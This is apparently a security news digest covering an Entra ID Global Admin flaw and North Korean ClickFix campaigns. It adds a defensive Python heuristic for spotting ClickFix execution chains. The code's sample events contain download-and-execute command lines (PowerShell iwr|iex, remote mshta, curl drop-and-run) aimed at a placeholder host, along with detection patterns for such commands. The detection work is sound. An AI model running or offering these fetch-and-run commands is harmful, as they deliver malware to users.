It's been a bit quiet over the last 24 hours, but we've still got a couple of critical updates to cover, including a significant vulnerability in Microsoft Entra ID and evolving tactics from DPRK threat actors. Let's dive in:
Global Admin Access in Microsoft Entra ID ⚠️
- A critical vulnerability (CVE-2025-55241) in Microsoft Entra ID (formerly Azure AD) could have allowed an attacker to gain Global Administrator privileges in *any* company's tenant.
- The flaw stemmed from a combination of undocumented, unsigned "actor tokens" and a vulnerability in the deprecated Azure AD Graph API, enabling impersonation and bypassing Conditional Access policies.
- Crucially, exploitation left virtually no trace in the victim tenant's logs, making detection extremely difficult. Microsoft has since patched the issue and is working to remove the underlying legacy components.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/microsoft-entra-id-flaw-allowed-hijacking-any-companys-tenant/
DPRK Hackers Evolve Tactics with ClickFix and AI 📰
- North Korean threat actors, a subset of the Lazarus Group, are refining their "Contagious Interview" campaigns, now using "ClickFix" social engineering to deliver BeaverTail info-stealer and InvisibleFerret backdoor.
- A notable shift in targeting sees them focusing on marketing and trader roles in the cryptocurrency and retail sectors, moving beyond their traditional software developer targets, and delivering the malware as compiled binaries for multiple operating systems.
- These groups are actively monitoring cyber threat intelligence platforms to improve their operational resilience, with other DPRK groups like Kimsuky also leveraging GitHub for C2 and even ChatGPT to forge deepfake military IDs for spear-phishing.
📰 The Hacker News | https://thehackernews.com/2025/09/dprk-hackers-use-clickfix-to-deliver.html
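ClickFix lures get the victim to paste a command into the Run dialog or a terminal themselves, so the first malicious process is typically an interpreter or downloader spawned directly by the user's shell (explorer.exe on Windows) with a command line that fetches and runs a payload. That description of the technique is general knowledge, not something the cited article is quoted on here. The heuristic below, an added example and not code from either source, scores constructed process-creation events (fields loosely modelled on Sysmon Event ID 1) for that chain; field names, sample values and thresholds are all assumptions for illustration.

```python
"""Heuristic detection of ClickFix-style execution chains in process-creation
telemetry. Added example for this digest, not code from the cited reporting.
Assumption: the first hop is an interpreter/downloader whose parent is the
user's shell (explorer.exe) and whose command line fetches and executes code.
"""
import re

# Constructed sample events (not real telemetry). Fields are an assumed,
# simplified shape; map your own SIEM/EDR columns onto them.
SAMPLE_EVENTS = [
    {"ts": "2025-09-18T09:01:00Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/x | iex"'},
    {"ts": "2025-09-18T09:02:00Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/a.hta"},
    {"ts": "2025-09-18T09:03:00Z",            # benign: user opened an editor
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"ts": "2025-09-18T09:04:00Z",            # benign: IDE-launched shell
     "parent": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"ts": "2025-09-18T09:05:00Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -s http://example.invalid/p -o %TEMP%\p.exe && %TEMP%\p.exe"},
]

# Binaries a pasted ClickFix command commonly lands in (assumed watch-list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
                "bitsadmin.exe"}

# Command-line traits; each hit adds one point. Patterns are illustrative.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypass_policy",   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("remote_fetch",    re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|"
                                   r"certutil|bitsadmin|mshta)\b.*https?://", re.I)),
    ("inline_exec",     re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("drop_and_run",    re.compile(r"-o\s+\S+\.exe.*&&", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process-creation event.

    Both structural conditions must hold before command-line traits count:
    the child is a known interpreter/downloader, and its parent is the user's
    shell. The parent check is what separates a pasted command from the same
    interpreter launched by an IDE, installer or scheduled task.
    """
    reasons: list[str] = []
    if basename(ev["image"]) not in INTERPRETERS:
        return 0, reasons
    if basename(ev["parent"]) != "explorer.exe":
        return 0, reasons
    for name, rx in INDICATORS:
        if rx.search(ev["cmdline"]):
            reasons.append(name)
    return len(reasons), reasons


def find_clickfix_candidates(events: list[dict], min_score: int = 1) -> list[dict]:
    """Events worth an analyst's attention, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= min_score:
            hits.append({"ts": ev["ts"], "image": basename(ev["image"]),
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: (-h["score"], h["ts"]))


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f'{hit["ts"]} {hit["image"]:<15} score={hit["score"]} {",".join(hit["reasons"])}')
```

On the sample, the PowerShell download-and-execute line, the remote HTA launch and the cmd/curl drop-and-run are reported; the editor launch and the IDE-spawned shell are not. Raise `min_score` to trade recall for precision, and extend `INTERPRETERS` for the non-Windows builds the article mentions, where the parent-shell check needs a different anchor than explorer.exe.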
#CyberSecurity #Vulnerability #Microsoft #EntraID #AzureAD #ThreatIntelligence #DPRK #NorthKorea #LazarusGroup #Malware #BeaverTail #InvisibleFerret #SocialEngineering #ClickFix #APT #InfoSec #CyberAttack